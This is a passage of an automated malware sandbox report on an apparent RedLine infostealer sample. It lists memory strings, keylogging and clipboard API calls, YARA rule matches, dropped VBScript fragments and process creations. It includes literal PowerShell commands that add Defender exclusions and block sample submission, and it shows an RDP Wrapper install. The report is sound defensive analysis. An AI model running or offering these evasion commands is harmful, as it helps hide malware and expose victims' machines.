              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoipAppData
              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
              Source: Rifiutare.exe.com, 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
              Source: wscript.exeString found in binary or memory: https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupda
              Source: cscript.exe, 00000026.00000003.2706083010.0000000002FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/asmtron/rdpwrap/master/bin/autoupdate.bat
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49842 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00408E84 SetWindowsHookExW 00000002,Function_00008E56,00000000,000000000_2_00408E84
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CAF345 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_00CAF345
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CAF5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00CAF5B0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A7F5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00A7F5B0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0061F5B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_0061F5B0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CAF345 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_00CAF345
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9A492 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,7_2_00C9A492
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CC9B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_00CC9B7E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A99B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00A99B7E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00639B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00639B7E

              System Summary

              barindex
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: Set xmlHttp = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: "Set obf_objXMLHTTP=CreateObject(""MSXML2.ServerXMLHTTP.6.0"")" & vbCrLf & _Jump to dropped file
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeDropped file: "Set obf_objXMLHTTP=CreateObject(""MSXML2.ServerXMLHTTP.6.0"")" & vbCrLf & _Jump to dropped file
              Source: C:\Windows\SysWOW64\cscript.exeDropped file: Set BR=CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
              Source: C:\Windows\SysWOW64\cscript.exeDropped file: Set BR=CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA4635: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,7_2_00CA4635
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C91A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_00C91A7B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_00C9F0CD
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A6F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00A6F0CD
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0060F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_0060F0CD
              Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\null
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004061280_2_00406128
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004058110_2_00405811
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004198C30_2_004198C3
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004178D60_2_004178D6
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040B2300_2_0040B230
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004142CC0_2_004142CC
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040BA900_2_0040BA90
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040F3200_2_0040F320
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040AB900_2_0040AB90
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040EBB80_2_0040EBB8
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040B4400_2_0040B440
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040A4E00_2_0040A4E0
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004195510_2_00419551
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00418D500_2_00418D50
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040C5F00_2_0040C5F0
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0041962B0_2_0041962B
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_0040A6A00_2_0040A6A0
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_004127FC0_2_004127FC
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C580C77_2_00C580C7
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C520977_2_00C52097
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C321FD7_2_00C321FD
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C523527_2_00C52352
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C6A30E7_2_00C6A30E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C4C45C7_2_00C4C45C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CBC5C47_2_00CBC5C4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CA28D77_2_00CA28D7
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C6E9207_2_00C6E920
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C98AB47_2_00C98AB4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C66B8B7_2_00C66B8B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C4CBB27_2_00C4CBB2
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C5CEC07_2_00C5CEC0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CC4F4F7_2_00CC4F4F
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C3D0007_2_00C3D000
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C671F97_2_00C671F9
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C395407_2_00C39540
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C517B47_2_00C517B4
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C39A207_2_00C39A20
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C51B267_2_00C51B26
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C57C3B7_2_00C57C3B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C51DD07_2_00C51DD0
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C39E807_2_00C39E80
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C57E6A7_2_00C57E6A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C4DF787_2_00C4DF78
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A2209710_2_00A22097
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A280C710_2_00A280C7
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A021FD10_2_00A021FD
